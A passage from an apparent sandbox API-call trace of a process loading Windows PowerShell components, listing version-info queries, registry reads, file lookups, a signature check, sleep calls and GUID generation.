nFileSizeHigh=0x0, nFileSizeLow=0x623400)) returned 1 [0075.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c3f00c) returned 1 [0075.742] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x6c3f100 | out: lpdwHandle=0x6c3f100) returned 0x94c [0075.812] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x48494c8 | out: lpData=0x48494c8) returned 1 [0075.814] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x6c3f0d4, puLen=0x6c3f0d0 | out: lplpBuffer=0x6c3f0d4*=0x4849564, puLen=0x6c3f0d0) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x4849640, puLen=0x6c3f050) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x4849694, puLen=0x6c3f050) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x48496f0, puLen=0x6c3f050) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x4849730, puLen=0x6c3f050) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x4849798, puLen=0x6c3f050) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x4849834, puLen=0x6c3f050) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x4849898, puLen=0x6c3f050) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x4849914, puLen=0x6c3f050) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x48495bc, puLen=0x6c3f050) returned 1 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x0, puLen=0x6c3f050) returned 0 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x0, puLen=0x6c3f050) returned 0 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x6c3f054, puLen=0x6c3f050 | out: lplpBuffer=0x6c3f054*=0x0, puLen=0x6c3f050) returned 0 [0075.819] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x6c3f048, puLen=0x6c3f044 | out: lplpBuffer=0x6c3f048*=0x4849564, puLen=0x6c3f044) returned 1 [0076.060] VerLanguageNameW (in: wLang=0x0, szLang=0x6c3edd8, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0076.306] VerQueryValueW (in: pBlock=0x48494c8, lpSubBlock="\\", lplpBuffer=0x6c3f058, puLen=0x6c3f054 | out: lplpBuffer=0x6c3f058*=0x48494f0, puLen=0x6c3f054) returned 1 [0076.317] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x6c3f098 | out: phkResult=0x6c3f098*=0x360) returned 0x0 [0076.317] RegQueryValueExW (in: hKey=0x360, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x6c3f0b8, lpData=0x0, lpcbData=0x6c3f0b4*=0x0 | out: lpType=0x6c3f0b8*=0x1, lpData=0x0, lpcbData=0x6c3f0b4*=0x8) returned 0x0 [0076.318] RegQueryValueExW (in: hKey=0x360, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x6c3f0b8, lpData=0x484dbf4, lpcbData=0x6c3f0b4*=0x8 | out: lpType=0x6c3f0b8*=0x1, lpData="3.0", lpcbData=0x6c3f0b4*=0x8) returned 0x0 [0076.319] RegCloseKey (hKey=0x360) returned 0x0 [0076.320] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6c3f7b8 | out: phkResult=0x6c3f7b8*=0x360) returned 0x0 [0076.320] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6c3f7d8, lpData=0x0, lpcbData=0x6c3f7d4*=0x0 | out: lpType=0x6c3f7d8*=0x1, lpData=0x0, lpcbData=0x6c3f7d4*=0x56) returned 0x0 [0076.320] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6c3f7d8, lpData=0x484dee4, lpcbData=0x6c3f7d4*=0x56 | out: lpType=0x6c3f7d8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6c3f7d4*=0x56) returned 0x0 [0076.321] RegCloseKey (hKey=0x360) returned 0x0 [0076.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0076.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0076.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c3f774) returned 1 [0076.324] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x6c3f7f0 | out: lpFileInformation=0x6c3f7f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0076.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c3f770) returned 1 [0076.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0076.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0076.330] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6c3f780 | out: phkResult=0x6c3f780*=0x360) returned 0x0 [0076.330] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6c3f7a0, lpData=0x0, lpcbData=0x6c3f79c*=0x0 | out: lpType=0x6c3f7a0*=0x1, lpData=0x0, lpcbData=0x6c3f79c*=0x56) returned 0x0 [0076.330] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6c3f7a0, lpData=0x484e5a0, lpcbData=0x6c3f79c*=0x56 | out: lpType=0x6c3f7a0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6c3f79c*=0x56) returned 0x0 [0076.330] RegCloseKey (hKey=0x360) returned 0x0 [0076.653] CoTaskMemAlloc (cb=0x20c) returned 0xb801a0 [0076.653] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb801a0 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0076.656] CoTaskMemFree (pv=0xb801a0) [0076.656] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0076.656] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0076.656] CoTaskMemAlloc (cb=0x20c) returned 0xb801a0 [0076.656] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0xb801a0 | out: pszPath="C:\\WINDOWS\\SysWOW64") returned 0x0 [0076.657] CoTaskMemFree (pv=0xb801a0) [0076.657] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0076.657] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64", nBufferLength=0x14, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64", lpFilePart=0x0) returned 0x13 [0076.657] CoTaskMemAlloc (cb=0x20c) returned 0xb801a0 [0076.657] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0xb801a0 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0076.658] CoTaskMemFree (pv=0xb801a0) [0076.658] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0076.658] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0076.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0076.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0076.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c3f6e8) returned 1 [0076.889] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x6c3f764 | out: lpFileInformation=0x6c3f764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0076.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c3f6e4) returned 1 [0076.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0076.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0076.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c3f6bc) returned 1 [0076.891] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3fc [0076.891] GetFileType (hFile=0x3fc) returned 0x1 [0076.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c3f6b8) returned 1 [0076.892] GetFileType (hFile=0x3fc) returned 0x1 [0077.260] WTGetSignatureInfo () returned 0x0 [0080.351] CertDuplicateCertificateContext (pCertContext=0x6fe1450) returned 0x6fe1450 [0080.585] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6c3f720 | out: phkResult=0x6c3f720*=0x634) returned 0x0 [0080.591] RegQueryValueExW (in: hKey=0x634, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6c3f740, lpData=0x0, lpcbData=0x6c3f73c*=0x0 | out: lpType=0x6c3f740*=0x1, lpData=0x0, lpcbData=0x6c3f73c*=0x56) returned 0x0 [0080.591] RegQueryValueExW (in: hKey=0x634, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6c3f740, lpData=0x488e8d8, lpcbData=0x6c3f73c*=0x56 | out: lpType=0x6c3f740*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6c3f73c*=0x56) returned 0x0 [0080.591] RegCloseKey (hKey=0x634) returned 0x0 [0080.592] CoTaskMemAlloc (cb=0x10) returned 0x704aad0 [0080.592] CoTaskMemAlloc (cb=0x30) returned 0x6ff75c0 [0080.593] WinVerifyTrust () returned 0x0 [0080.596] CoTaskMemFree (pv=0x6ff75c0) [0080.596] CoTaskMemFree (pv=0x704aad0) [0080.596] CertFreeCertificateContext (pCertContext=0x6fe1450) returned 1 [0080.597] CloseHandle (hObject=0x3fc) returned 1 [0080.603] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0080.810] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0080.981] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0081.215] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0081.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0081.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0081.836] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0082.022] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0082.279] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0082.531] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0082.703] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0082.887] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0083.075] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0083.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0083.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0083.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0083.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0084.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0084.433] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0084.591] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0084.759] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.100] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.199] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.250] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.323] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.368] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.573] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0085.855] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0086.010] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0086.355] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0086.542] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0086.757] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0086.891] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0087.069] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0087.333] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0087.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0087.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0087.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0094.816] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6c3f5fc | out: phkResult=0x6c3f5fc*=0x698) returned 0x0 [0094.820] RegQueryValueExW (in: hKey=0x698, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6c3f61c, lpData=0x0, lpcbData=0x6c3f618*=0x0 | out: lpType=0x6c3f61c*=0x1, lpData=0x0, lpcbData=0x6c3f618*=0x56) returned 0x0 [0094.820] RegQueryValueExW (in: hKey=0x698, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6c3f61c, lpData=0x494f684, lpcbData=0x6c3f618*=0x56 | out: lpType=0x6c3f61c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6c3f618*=0x56) returned 0x0 [0094.820] RegCloseKey (hKey=0x698) returned 0x0 [0095.597] GetTimeZoneInformation (in: lpTimeZoneInformation=0x6c3f3cc | out: lpTimeZoneInformation=0x6c3f3cc) returned 0x1 [0095.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6c3ec40, nSize=0x80 | out: lpBuffer="က溹က溹") returned 0x0 [0095.602] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x76e7345d, Data2=0xfc56, Data3=0x423a, Data4=([0]=0xb4, [1]=0xe9, [2]=0x83, [3]=0x77, [4]=0x50, [5]=0x41, [6]=0x78, [7]=0x9e))) returned 0x0 [0095.711] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xa42657e8, Data2=0x33ec, Data3=0x44a6, Data4=([0]=0x94, [1]=0x8a, [2]=0x2d, [3]=0x90, [4]=0xea, [5]=0xce, [6]=0x8a, [7]=0x2c))) returned 0x0 [0095.715] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4e3ef8b8, Data2=0x38d5, Data3=0x4c1f, Data4=([0]=0xb9, [1]=0x4f, [2]=0xde, [3]=0x20, [4]=0x54, [5]=0xf3, [6]=0xad, [7]=0x91))) returned 0x0 [0095.717] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4bb8908f, Data2=0x8663, Data3=0x4403, Data4=([0]=0xa4, [1]=0x56, [2]=0x8, [3]=0x77, [4]=0xe9, [5]=0x3d, [6]=0xaf, [7]=0xfe))) returned 0x0 [0095.721] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x621268f6, Data2=0x1d99, Data3=0x4f4b, Data4=([0]=0x82, [1]=0x1e, [2]=0x93, [3]=0x2e, [4]=0xad, [5]=0x5f, [6]=0x19, [7]=0xa))) returned 0x0 [0095.722] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc18eae8b, Data2=0x3a94, Data3=0x44a8, Data4=([0]=0x89, [1]=0x3d, [2]=0x12, [3]=0x73, [4]=0xd3, [5]=0xee, [6]=0x5e, [7]=0xf6))) returned 0x0 [0095.726] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x17c799cc, Data2=0xbec9, Data3=0x47d9, Data4=([0]=0x91, [1]=0x6d, [2]=0xcb, [3]=0x97, [4]=0xa9, [5]=0x48, [6]=0xc5, [7]=0xf))) returned 0x0 [0095.736] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x2a4d7da2, Data2=0x64bb, Data3=0x41cc, Data4=([0]=0xaf, [1]=0xee, [2]=0x79, [3]=0xc8, [4]=0xc7, [5]=0x92, [6]=0x6b, [7]=0xce))) returned 0x0 [0095.742] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x6c7fd7a1, Data2=0x2132, Data3=0x4479, Data4=([0]=0xa2, [1]=0xfe, [2]=0xdb, [3]=0xf3, [4]=0x4e, [5]=0xf1, [6]=0xdb, [7]=0xd7))) returned 0x0 [0095.742] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x139c9676, Data2=0xd8bc, Data3=0x4be3, Data4=([0]=0xa8, [1]=0x5f, [2]=0x57, [3]=0xfb, [4]=0xba, [5]=0x87, [6]=0xcd, [7]=0x56))) returned 0x0 [0095.896] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xfc3816a5, Data2=0xd703, Data3=0x4e12, Data4=([0]=0xb9, [1]=0xd2, [2]=0x53, [3]=0x79, [4]=0x5c, [5]=0xf9, [6]=0xa1, [7]=0x8b))) returned 0x0 [0095.901] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x94157900, Data2=0xc2d, Data3=0x4661, Data4=([0]=0x98, [1]=0x7c, [2]=0x36, [3]=0x76, [4]=0x87, [5]=0x6e, [6]=0xb7, [7]=0x79))) returned 0x0 [0095.950] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc39d0bea, Data2=0xbe9, Data3=0x46b5, Data4=([0]=0x94, [1]=0x9d, [2]=0x88, [3]=0x63, [4]=0x8e, [5]=0x85, [6]=0xfd, [7]=0x16))) returned 0x0 [0095.950] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf84898e4, Data2=0xd7f2, Data3=0x4977, Data4=([0]=0xa8, [1]=0x23, [2]=0x5f, [3]=0xa6, [4]=0x4b, [5]=0x39, [6]=0xa6, [7]=0x76))) returned 0x0 [0095.955] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x8056c84d, Data2=0x511, Data3=0x46d3, Data4=([0]=0x90, [1]=0x80, [2]=0xc3, [3]=0x57, [4]=0xbf, [5]=0x1d, [6]=0x35, [7]=0x5f))) returned 0x0 [0095.955] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x2ff612d7, Data2=0x424, Data3=0x4bfc, Data4=([0]=0xb5, [1]=0xab, [2]=0xa2, [3]=0x3f, [4]=0x83, [5]=0x4d, [6]=0x4, [7]=0x7c))) returned 0x0 [0095.960] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf5a8c7d4, Data2=0x7cce, Data3=0x488c, Data4=([0]=0xb8, [1]=0x81, [2]=0x3a, [3]=0x49, [4]=0x92, [5]=0xec, [6]=0xf1, [7]=0x22))) returned 0x0 [0095.960] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xa5e08556, Data2=0x5d86, Data3=0x4a7b, Data4=([0]=0xb9, [1]=0xd5, [2]=0x9c, [3]=0xdd, [4]=0x92, [5]=0x54, [6]=0x7b, [7]=0xe6))) returned 0x0 [0095.964] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf5dca0fe, Data2=0xf1c8, Data3=0x49a5, Data4=([0]=0x91, [1]=0x49, [2]=0x9a, [3]=0xb3, [4]=0xfe, [5]=0x1c, [6]=0xe5, [7]=0xe7))) returned 0x0 [0095.967] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4c01c2c1, Data2=0xa5be, Data3=0x49d5, Data4=([0]=0xa5, [1]=0x35, [2]=0x1b, [3]=0x98, [4]=0xa6, [5]=0x89, [6]=0x6f, [7]=0x72))) returned 0x0 [0095.971] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x9f1d452b, Data2=0x9212, Data3=0x4be1, Data4=([0]=0xb9, [1]=0x6b, [2]=0xb2, [3]=0xd4, [4]=0xd9, [5]=0xff, [6]=0x71, [7]=0x96))) returned 0x0 [0095.971] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xefd7f28f, Data2=0xf952, Data3=0x44cf, Data4=([0]=0xb7, [1]=0x68, [2]=0xe, [3]=0xca, [4]=0x80, [5]=0x21, [6]=0x35, [7]=0xc4))) returned 0x0 [0095.976] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x23bcd651, Data2=0xd3db, Data3=0x4c06, Data4=([0]=0xa0, [1]=0xc8, [2]=0xdd, [3]=0xee, [4]=0xd7, [5]=0xfc, [6]=0x63, [7]=0x18))) returned 0x0 [0096.167] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xa625e057, Data2=0x789c, Data3=0x43b1, Data4=([0]=0xa6, [1]=0x11, [2]=0xb7, [3]=0x71, [4]=0x67, [5]=0x87, [6]=0x3d, 